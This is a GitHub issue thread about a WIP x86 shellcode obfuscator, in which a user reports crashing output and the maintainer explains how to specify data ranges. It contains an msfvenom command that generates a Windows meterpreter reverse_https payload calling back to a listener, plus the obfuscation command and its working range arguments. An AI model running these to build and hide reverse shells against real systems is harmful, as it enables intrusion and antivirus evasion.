search

kgretzky / python-x86-obfuscator

This is a **WIP** tool that performs shellcode obfuscation in x86 instruction set.
MIT License
225 stars 77 forks source link

Can't generate working shellcode #8

Open vysecurity opened 8 years ago

vysecurity commented 8 years ago

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

kgretzky commented 8 years ago

Can you send me one of the shellcodes that you are trying to obfuscate? They may have some hardcoded offsets that make obfuscation impossible.

You can send in binary form and i will disassemble myself. On 8 Jul 2016 16:05, "Vincent Yiu" notifications@github.com wrote:

So all of the generated shell code seems to be broken...

I can't generate working shell code that does not crash.

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/kgretzky/python-x86-obfuscator/issues/8, or mute the thread https://github.com/notifications/unsubscribe/ASXmJwLCEny0fDoOPcievV3DG_n6vMj5ks5qTlkOgaJpZM4JID_Y .

vysecurity commented 8 years ago

Email? :)

vysecurity commented 8 years ago

Actually, I just did:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.58.128 LPORT=443 -f raw -o /root/sc.bin

python x86_obf.py -i /root/sc.bin -o /root/sc2.bin -r0-184

vysecurity commented 8 years ago

sc.bin injects fine and calls back. sc2.bin crashes.

kgretzky commented 8 years ago

Ah sure :)

kuba -at- breakdev.org On 8 Jul 2016 16:27, "Vincent Yiu" notifications@github.com wrote:

Email? :)

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/python-x86-obfuscator/issues/8#issuecomment-231373880, or mute the thread https://github.com/notifications/unsubscribe/ASXmJ0MXVoxcsVBCR92LdHM6J3Ya7fudks5qTl49gaJpZM4JID_Y .

kgretzky commented 8 years ago

Can you send me the sc.bin file? I don't have the metasploit environment around me currently. I will take a look at it and let you know what's up.

vysecurity commented 8 years ago

Sent Email.

kgretzky commented 8 years ago

Thanks, got it! I took a look and it seems the reverse_https has a lot of static data (of variable length at every generation unfortunately), so before obfuscating the generated shellcode you need to specify the proper data ranges, so that the obfuscator knows which parts of the shellcode is not code up for obfuscation.

Take a look: http://i.imgur.com/lN7W7t3.png I highlighted the largest data block in the middle, and there is also a data block in the end with the IP address string. You need to view each generated shellcode and manually figure out the data ranges.

In your situation for this specific sc.bin file, the argument for specifiying code ranges would look like this: -r0-184,329-465,481-490

For now I'd advise to use the reverse_tcp payload as it doesn't have any static data blocks. I will be working on Metasploit generator tool using Obfusion library that will simplify the process of generating obfuscated shellcodes.

vysecurity commented 8 years ago

Thanks. I think I get it. I'll go into some more work with this :)